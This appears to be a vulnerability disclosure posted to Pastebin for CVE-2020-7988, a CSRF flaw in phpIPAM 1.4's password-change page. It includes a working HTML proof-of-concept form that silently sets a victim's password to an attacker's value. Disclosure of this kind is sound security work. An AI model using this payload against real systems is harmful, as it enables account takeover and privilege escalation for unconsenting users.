Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- > [Suggested description]
- > An issue was discovered in tools/pass-change/result.php in phpIPAM 1.4.
- > CSRF can be used to change the password of any user/admin, to
- > escalate privileges, and to gain access to more data and functionality. This issue exists
- > due to the lack of a requirement to provide the old password, and the lack of security
- > tokens.
- >
- > ------------------------------------------
- >
- > [Additional Information]
- > I've sent to the vendor with the vulnerability details but haven't received any reply yet.
- >
- > CSRF POC:
- >
- > <html>
- > <body>
- > <script>history.pushState('', '', '/')</script>
- > <form action="http://hostname/app/tools/pass-change/result.php" method="POST">
- > <input type="hidden" name="ipampassword1" value="attackers_password" />
- > <input type="hidden" name="ipampassword2" value="attackers_password" />
- > <input type="submit" value="Submit request" />
- > </form>
- > </body>
- > </html>
- >
- > ------------------------------------------
- >
- > [Vulnerability Type]
- > Cross Site Request Forgery (CSRF)
- >
- > ------------------------------------------
- >
- > [Vendor of Product]
- > phpIPAM
- >
- > ------------------------------------------
- >
- > [Affected Product Code Base]
- > phpIPAM - 1.4
- >
- > ------------------------------------------
- >
- > [Affected Component]
- > result.php
- >
- > ------------------------------------------
- >
- > [Attack Type]
- > Remote
- >
- > ------------------------------------------
- >
- > [Impact Escalation of Privileges]
- > true
- >
- > ------------------------------------------
- >
- > [CVE Impact Other]
- > Account Takeover
- >
- > ------------------------------------------
- >
- > [Attack Vectors]
- > Crafting a post request in a button with the new password and luring the victim to click it.
- >
- > ------------------------------------------
- >
- > [Reference]
- > https://phpipam.net/news/phpipam-v1-5-released/
- >
- > ------------------------------------------
- >
- > [Discoverer]
- > Khalid Amin https://hackerone.com/khalidamin
- CVE-2020-7988.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement